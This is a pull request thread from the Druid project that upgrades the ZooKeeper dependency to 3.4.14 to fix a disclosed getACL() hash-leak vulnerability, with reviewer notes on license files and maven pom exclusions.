Zookeeper version is updated.

[kamaci]

Fixes #8362.

Description

Zookeeper version should be upgraded to version 3.4.14 or later due to it has a vulnerability:

An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper's getACL() command doesn't check any permission when retrieves the ACLs of the requested node and returns all information contained in the ACL Id field as plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.

and has a critical bug.

Zookeeper version is upgraded to 3.4.14

---

This PR has:

• been self-reviewed.
• added documentation for new or modified features or behaviors.
• added Javadocs for most classes and all non-trivial methods. Linked related entities via Javadoc links.
• added comments explaining the "why" and the intent of the code wherever would not be obvious for an unfamiliar reader.
• added unit tests or modified existing tests to cover new code paths.
• added integration tests.
• been tested in a test Druid cluster.

---

[clintropolis]

This is a somewhat duplicate of #8177, but maybe still worth going ahead and doing since the other is tied up in the curator issue.

After #7998 and #8306 (which was just merged and the cause of your conflicts), LICENSE.BINARY and NOTICE.BINARY are both autogenerated from the contents of licenses.yaml at the root of the project. #8367 will add instructions to the PR template indicating that this should be done if dependency versions are bumped, but it is not merged yet.

Could you please fix conflicts update the zookeeper entry 'version' and 'notice' text in licenses.yaml?

For the notice, it looks like changing to:

Apache ZooKeeper
Copyright 2009-2019 The Apache Software Foundation

should be sufficient.

[kamaci]

@clintropolis I've updated my PR.

[clintropolis]

Due to https://issues.apache.org/jira/browse/ZOOKEEPER-3367, It looks like we need to exclude spotbugs-annotations from the zookeeper dependency since it is LGPL licensed (which is the reason all of the tests on this PR are failing).

        <exclusion>
          <groupId>com.github.spotbugs</groupId>
          <artifactId>spotbugs-annotations</artifactId>
        </exclusion>

in the root pom.xml entry for zookeeper.

Additionally, for some reason I don't entirely understand, updating the zk version also breaks materialized-view-maintenance and materialized-view-selection, which need this:

        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.hamcrest</groupId>
            <artifactId>hamcrest-all</artifactId>
            <scope>test</scope>
        </dependency>

added to extensions-contrib/materialized-view-maintenance/pom.xml and extensions-contrib/materialized-view-selection/pom.xml respectively.

After these changes, everything was able to compile and the license check was able to pass successfully for me.

[kamaci]

I've updated my PR.

[clintropolis]

Oops, you've updated the notice for the zookeeper bundled in the hadoop-client, instead of the one in core druid that you actually updated the version for (notice starts on line 1458).

[kamaci]

👍

[clintropolis]

lgtm, thanks 👍